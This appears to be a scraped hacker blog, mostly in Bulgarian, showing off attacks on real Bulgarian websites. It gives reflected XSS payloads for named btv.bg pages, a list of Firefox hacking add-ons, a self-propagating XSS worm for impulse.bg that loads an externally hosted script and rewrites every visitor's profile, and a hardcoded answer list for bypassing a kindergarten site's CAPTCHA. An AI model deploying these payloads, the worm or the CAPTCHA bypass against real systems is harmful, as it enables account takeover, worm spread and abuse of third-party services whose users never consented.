new btv.bg multiple xss issues

new year, new site, new…xsses 🙂

http://www.btv.bg/horoscope/daily_horoscope.pcgi?sign_id=

“][/img][/h3][script]alert(‘nigonized’)[/script]<!—

search box xss vuln:

“][script]alert(‘nigonized’)[/script]<!—

to be continued….

ff’s grand sixteen

1. HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
2. FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
3. Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
4. Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
5. Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]
6. SwitchProxy Tool [https://addons.mozilla.org/en-US/firefox/addon/125]
7. Foxy Proxy [ https://addons.mozilla.org/en-US/firefox/addon/2464 ]
8. Reload Every [https://addons.mozilla.org/en-US/firefox/addon/115]
9. User Agent Switcher [ https://addons.mozilla.org/en-US/firefox/addon/59 ]
10. View Cookies [ https://addons.mozilla.org/en-US/firefox/addon/3587 ]
11. Modify Headers [ https://addons.mozilla.org/en-US/firefox/addon/967 ]
12. TiX Now! [https://addons.mozilla.org/en-US/firefox/addon/3601]
13. Wmlbrowser [ https://addons.mozilla.org/en-US/firefox/addon/62 ]
14. XSSMe [http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi]
15. SQL Inject-me [http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi]
16. Grease Monkey [https://addons.mozilla.org/en-US/firefox/addon/748]

worming impulse.bg

impulse.bg позволява използването на HTML в “title”, точно както прави myspace.com с малката разлика, че няма забрани.

Веднага прави впечатление, това:

GET /js/scriptaculous/scriptaculous.js

което само по себе си прави нашето занимание по-лесно и красиво. Поставяйки в “Заглавие” полето нещо от рода на:

{script src=”www.mysite.com/impulse.js”}{/script}

impulse.js contents:

var params = “name=wormy!&email=nigon.hacked.in%40gmail.com&country=1&city_id=5&
city=&birthday=11&birthmonth=8&birthyear=1980&gender=1&
search_gender=2&height=0&weight=0&eyes=0&hair=0&
occupation=0&smoke=1&alchohol=1&title=%3Cscript%20src
%3D%22http%3A%2F%2Fmysite.com/impulse.js%22%3E%3C%2Fscript%3E&
info=&msg_report=1&comment_report=1&
Submit=%D0%9F%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0%B8”;

var MyAjax = new Ajax.Request (‘/myinfo’, {
method: ‘post’,
parameters: params
});

резултат:
при всяко посещение на “заразения” профил…всички логнати в с-мата ще бъдат също заразени…така до безкрайност…за ефекност бихме могли да променим джаваскрипт кода като сложим екстри от рода на window.location=. Creativity is the key. 😉

деца…градини…глупост…фалш

демагогията е на ход…

след като се случи това:

http://news.ibox.bg/news/id_2042186633

се въведе CAPTCHA(“CAPCTHA”) в същия…да, ама не…

http://kg.sofia.bg/i/captcha/1-100.GIF

глупост след глупост…какво става след като се опишат всички .гиф-чета(1-100…20 минути) в един масив? Не знам…не разбирам…

$captchas = array(
“T490″,”25T4″,”441T”,”4984″,”5500″,”5561″,
“8597”,”5T24″,”1864″,”2514″,”T154″,”2556″,
“4612”,”3296″,”64T0″,”5354″,”6000″,”458T”,
“1190”,”916T”,”6082″,”5819″,”4102″,”3169″,
“419T”,”1014″,”1355″,”8566″,”8829″,”5045″,
“5580”,”6268″,”16T3″,”4047″,”3315″,”3445″,
“T3T6″,”4380″,”8389″,”4404″,”235T”,”4808″,
“1005”,”9509″,”T592″,”5341″,”64TT”,”T316″,
“6159”,”2127″,”T965″,”T223″,”5522″,”6333″,
“5832”,”3122″,”3916″,”T839″,”8695″,”5433″,
“3T96″,”8483″,”8540″,”9900″,”2847″,”T005”,
“4844”,”6220″,”8150″,”616T”,”TT30″,”31TT”,
“3684”,”9502″,”2T96″,”T965″,”9281″,”9989″,
“1026”,”9026″,”5668″,”3911″,”40T5″,”4624″,
“TT64″,”6039″,”T985″,”802T”,”1294″,”240T”,
“14TT”,”TT14″,”21T3″,”998T”,”2412″,”8132″,
“4835”,”890T”,”2163″,”5291″);